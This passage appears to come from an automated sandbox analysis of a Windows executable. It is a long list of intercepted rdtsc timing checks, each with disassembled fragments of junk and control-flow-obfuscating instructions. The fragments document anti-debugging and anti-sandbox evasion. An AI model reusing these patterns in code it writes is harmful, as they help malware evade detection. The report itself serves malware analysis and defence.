              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1152EE7 second address: 1152EFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F420070EDE6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1153172 second address: 1153179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1153FD7 second address: 1153FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1153FDB second address: 1153FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1154F73 second address: 1154F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1155A75 second address: 1155A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1155A7B second address: 1155AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F420070EDE8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 sbb di, 4F56h 0x00000028 push 00000000h 0x0000002a jmp 00007F420070EDEAh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F420070EDE8h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b movsx esi, cx 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 pushad 0x00000052 popad 0x00000053 pop eax 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11584DE second address: 11584F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD291Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11584F3 second address: 11584F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11584F7 second address: 1158501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115B174 second address: 115B17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115B17A second address: 115B19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4200FD2923h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115B19E second address: 115B1A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F420070EDE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115B1A8 second address: 115B23A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F4200FD2918h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+122D37B4h] 0x0000002d mov ebx, eax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F4200FD2918h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b jmp 00007F4200FD2923h 0x00000050 push 00000000h 0x00000052 push 00000000h 0x00000054 push ebp 0x00000055 call 00007F4200FD2918h 0x0000005a pop ebp 0x0000005b mov dword ptr [esp+04h], ebp 0x0000005f add dword ptr [esp+04h], 00000016h 0x00000067 inc ebp 0x00000068 push ebp 0x00000069 ret 0x0000006a pop ebp 0x0000006b ret 0x0000006c xchg eax, esi 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F4200FD291Ah 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115C361 second address: 115C365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115C365 second address: 115C36B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115C36B second address: 115C36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115B44B second address: 115B450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115B450 second address: 115B46C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F420070EDE6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115B46C second address: 115B477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115C4C0 second address: 115C4C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115C4C4 second address: 115C4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115C4CA second address: 115C4FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F420070EDF6h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jnc 00007F420070EDECh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115C4FA second address: 115C4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115C4FE second address: 115C57A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ebx, ecx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F420070EDE8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b jmp 00007F420070EDF9h 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 pushad 0x00000038 mov ax, bx 0x0000003b mov dword ptr [ebp+122D253Eh], esi 0x00000041 popad 0x00000042 mov eax, dword ptr [ebp+122D1605h] 0x00000048 pushad 0x00000049 je 00007F420070EDE9h 0x0000004f adc bh, 00000064h 0x00000052 popad 0x00000053 mov ebx, dword ptr [ebp+12451E4Ah] 0x00000059 push FFFFFFFFh 0x0000005b or dword ptr [ebp+122D19AEh], edi 0x00000061 nop 0x00000062 pushad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115E2D1 second address: 115E347 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F4200FD2918h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D19FBh], ebx 0x00000027 mov edi, dword ptr [ebp+122D37A0h] 0x0000002d push 00000000h 0x0000002f adc bh, FFFFFFCEh 0x00000032 jmp 00007F4200FD2920h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F4200FD2918h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+122D3914h] 0x00000059 xchg eax, esi 0x0000005a pushad 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115E347 second address: 115E362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 ja 00007F420070EDE6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jc 00007F420070EDE6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115E362 second address: 115E36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115E4BA second address: 115E55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F420070EDF7h 0x0000000b push dword ptr fs:[00000000h] 0x00000012 or bl, FFFFFFE7h 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c ja 00007F420070EDEEh 0x00000022 mov eax, dword ptr [ebp+122D1219h] 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007F420070EDE8h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov ebx, 426EE2D2h 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push ebx 0x0000004c call 00007F420070EDE8h 0x00000051 pop ebx 0x00000052 mov dword ptr [esp+04h], ebx 0x00000056 add dword ptr [esp+04h], 0000001Bh 0x0000005e inc ebx 0x0000005f push ebx 0x00000060 ret 0x00000061 pop ebx 0x00000062 ret 0x00000063 mov edi, dword ptr [ebp+122D28D5h] 0x00000069 sub dword ptr [ebp+1244BBEEh], eax 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 ja 00007F420070EDECh 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115E55E second address: 115E563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 115E563 second address: 115E569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1160656 second address: 116065A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11623ED second address: 11623F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11623F3 second address: 11623F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11623F7 second address: 116243D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+122D2A84h], eax 0x00000011 push 00000000h 0x00000013 movzx edi, bx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F420070EDE8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov edi, 7533E328h 0x00000037 movsx ebx, cx 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 116243D second address: 1162441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 116151D second address: 116154A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F420070EDF4h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push esi 0x0000000e jmp 00007F420070EDECh 0x00000013 pop esi 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1162441 second address: 116244B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 116244B second address: 1162465 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F420070EDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F420070EDECh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11625E3 second address: 11625F2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4200FD2916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11625F2 second address: 116260E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F420070EDF3h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1164481 second address: 116449A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4200FD2921h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 116547A second address: 116547E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 116547E second address: 1165484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1165484 second address: 116549B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F420070EDF3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11636D5 second address: 11636EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F4200FD291Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11636EA second address: 1163773 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F420070EDECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F420070EDE8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov edi, eax 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 mov ebx, dword ptr [ebp+122D3948h] 0x0000003b mov eax, dword ptr [ebp+122D0D2Dh] 0x00000041 push 00000000h 0x00000043 push esi 0x00000044 call 00007F420070EDE8h 0x00000049 pop esi 0x0000004a mov dword ptr [esp+04h], esi 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc esi 0x00000057 push esi 0x00000058 ret 0x00000059 pop esi 0x0000005a ret 0x0000005b mov edi, dword ptr [ebp+122D372Ch] 0x00000061 push FFFFFFFFh 0x00000063 mov ebx, dword ptr [ebp+122D288Ch] 0x00000069 mov dword ptr [ebp+1246D2ADh], eax 0x0000006f nop 0x00000070 push ecx 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1163773 second address: 116379D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jg 00007F4200FD2916h 0x00000011 jmp 00007F4200FD2925h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1167AC5 second address: 1167B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 or ebx, dword ptr [ebp+122D370Ch] 0x0000000c push 00000000h 0x0000000e mov ebx, eax 0x00000010 xor ebx, 4CAE1EF1h 0x00000016 push 00000000h 0x00000018 jmp 00007F420070EDEAh 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f jmp 00007F420070EDF7h 0x00000024 jnl 00007F420070EDE8h 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F420070EDECh 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1167CC1 second address: 1167CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4200FD2928h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 116BE4A second address: 116BE54 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 116BEF6 second address: 116BF10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2922h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1175704 second address: 1175709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1175709 second address: 117570F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117570F second address: 1175715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117B1DA second address: 117B221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD2927h 0x00000009 popad 0x0000000a jnp 00007F4200FD292Ch 0x00000010 jmp 00007F4200FD2926h 0x00000015 pushad 0x00000016 jmp 00007F4200FD291Ah 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117B221 second address: 117B238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F420070EDE6h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117B238 second address: 117B253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD2924h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117B253 second address: 117B259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117B259 second address: 117B271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4200FD2924h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1107EA5 second address: 1107EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117B9F9 second address: 117B9FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117BB4F second address: 117BB53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117BB53 second address: 117BB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 117BB59 second address: 117BB60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1111E0E second address: 1111E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD291Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4200FD2922h 0x00000010 jmp 00007F4200FD291Bh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1111E3F second address: 1111E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1181945 second address: 118194A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1181A9E second address: 1181AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1181EDC second address: 1181EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11821C5 second address: 11821E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F420070EDF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11821E1 second address: 11821E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11821E6 second address: 11821EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
